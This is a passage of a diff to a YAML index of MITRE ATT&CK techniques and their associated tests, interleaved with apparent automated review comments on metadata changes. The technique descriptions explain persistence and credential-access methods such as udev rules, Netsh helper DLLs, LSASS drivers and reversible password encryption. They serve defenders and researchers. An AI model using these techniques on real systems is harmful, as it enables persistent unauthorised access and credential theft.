name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
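Review bot: this hunk mixes a pure key reordering of T1556.001 and T1556.005 (`x_mitre_platforms`, `external_references`, `id` and `created` moved from the top of the object to the bottom) with substantive changes (`x_mitre_version` 2.0 to 2.1, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, `revoked: false` added, `x_mitre_permissions_required: Administrator` removed), which makes the real changes hard to spot; if the generator can emit keys in a stable order, future diffs stay reviewable. The dropped `x_mitre_permissions_required` has no replacement field in the new object, so anything that surfaces required privileges from this index should be checked.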
@@ -59473,6 +59835,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -59483,23 +59846,50 @@ persistence:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -59516,7 +59906,7 @@ persistence:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -59575,7 +59965,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -59657,7 +60046,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1543.002:
@@ -59772,12 +60160,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1136:
technique:
- modified: '2024-01-31T20:46:43.215Z'
+ modified: '2024-10-15T15:53:21.895Z'
name: Create Account
description: |-
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -59800,16 +60187,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- Network
- Containers
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -59836,7 +60222,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.013:
technique:
@@ -59905,7 +60290,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.007:
technique:
@@ -59941,7 +60325,7 @@ persistence:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -59960,12 +60344,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -60015,7 +60398,6 @@ persistence:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests:
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -60134,7 +60516,7 @@ persistence:
elevation_required: true
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -60167,9 +60549,10 @@ persistence:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
@@ -60186,9 +60569,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -60234,12 +60616,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1653:
technique:
- modified: '2023-09-30T21:28:45.038Z'
+ modified: '2024-10-16T20:11:40.334Z'
name: Power Settings
description: |-
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -60253,7 +60634,7 @@ persistence:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Juan Tapiador
x_mitre_deprecated: false
x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -60312,7 +60693,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.001:
technique:
@@ -60338,7 +60718,7 @@ persistence:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -60364,8 +60744,6 @@ persistence:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests:
- name: Logon Scripts
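Review bot: for T1037.001 this hunk removes `x_mitre_attack_spec_version: 2.1.0` together with `spec_version`, and unlike the T1556.001 and T1556.005 objects earlier in the patch no `x_mitre_attack_spec_version: 3.2.0` or `x_mitre_modified_by_ref` is added in the visible lines; confirm the key still exists elsewhere in the reordered object, otherwise this technique ends up without an attack spec version while the rest of the file keeps one.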
@@ -60395,7 +60773,7 @@ persistence:
name: command_prompt
T1137.002:
technique:
- modified: '2024-04-16T12:41:55.175Z'
+ modified: '2024-10-15T16:01:48.325Z'
name: 'Office Application Startup: Office Test'
description: |-
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -60419,8 +60797,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'Command: Command Execution'
@@ -60450,7 +60828,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1137.002
atomic_tests:
- name: Office Application Startup Test Persistence (HKCU)
@@ -60535,7 +60912,7 @@ persistence:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -60560,7 +60937,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests:
- name: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
@@ -60604,7 +60980,7 @@ persistence:
elevation_required: true
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60644,8 +61020,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -60653,13 +61031,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -60690,17 +61068,14 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -60763,7 +61138,7 @@ persistence:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -60797,8 +61172,8 @@ persistence:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -60807,6 +61182,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
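Review bot: the new `Malicious Life by Cybereason` reference URL ends in `#blog-subscribe`, a subscribe-widget anchor on the page rather than part of the article location, and the author field reads `(n.d.)` even though a retrieval date is given. If these objects are mirrored verbatim from the upstream ATT&CK bundle the fix belongs upstream; otherwise drop the fragment here.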
@@ -60819,7 +61198,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
@@ -60839,7 +61217,7 @@ persistence:
'
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -60852,6 +61230,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -60888,17 +61267,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -60944,9 +61323,65 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.007:
technique:
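Review bot: the detection text for the new T1546.017 object tells readers to monitor file creation and modification of udev rule files, but the data sources listed for it are only `Process: Process Creation` and `File: File Modification`, so `File: File Creation` is missing; either add it or confirm the upstream object really omits it. In the same string, `/usr/lib/udev/rules.d/` is the only one of the three paths not wrapped in backticks, so the rendered text will format it differently from `/etc/udev/rules.d/` and `/lib/udev/rules.d/`.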
@@ -60983,7 +61418,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
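Review bot: `modified` for Netsh Helper DLL moves backwards here, from `2022-05-11T14:00:00.188Z` to `2022-04-20T17:09:17.363Z`, and the same regression appears later in the patch for Network Device Authentication, Dylib Hijacking, COR_PROFILER, Socket Filters, Fast Flux DNS, Traffic Signaling and Protocol Tunneling. Every replaced value carries the same `14:00:00.188Z` or `14:49:39.188Z` time of day, which looks like a release stamp rather than a per-object edit time, so the generator has presumably switched to the object's own timestamp. State that in the commit message, because anything that compares `modified` against a cached copy of this index will otherwise read these entries as older than what it already has.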
@@ -61007,7 +61442,6 @@ persistence:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests:
- name: Netsh Helper DLL Registration
@@ -61047,46 +61481,7 @@ persistence:
elevation_required: true
T1505.001:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
- type: attack-pattern
- created: '2019-12-12T14:59:58.168Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1505.001
- url: https://attack.mitre.org/techniques/T1505/001
- - source_name: NetSPI Startup Stored Procedures
- url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
- SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
- - source_name: Kaspersky MSSQL Aug 2019
- url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
- description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
- attack on Microsoft SQL Server. Retrieved September 4, 2019.'
- - source_name: Microsoft xp_cmdshell 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
- description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
- September 9, 2019.
- - source_name: Microsoft CLR Integration 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
- description: Microsoft. (2017, June 19). Common Language Runtime Integration.
- Retrieved July 8, 2019.
- - source_name: NetSPI SQL Server CLR
- url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
- description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
- Retrieved July 8, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-15T16:05:24.007Z'
name: SQL Stored Procedures
description: "Adversaries may abuse SQL stored procedures to establish persistent
access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -61109,20 +61504,57 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_deprecated: false
x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
NetSPI Startup Stored Procedures) Consider enabling audit features that can
log malicious startup activities.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
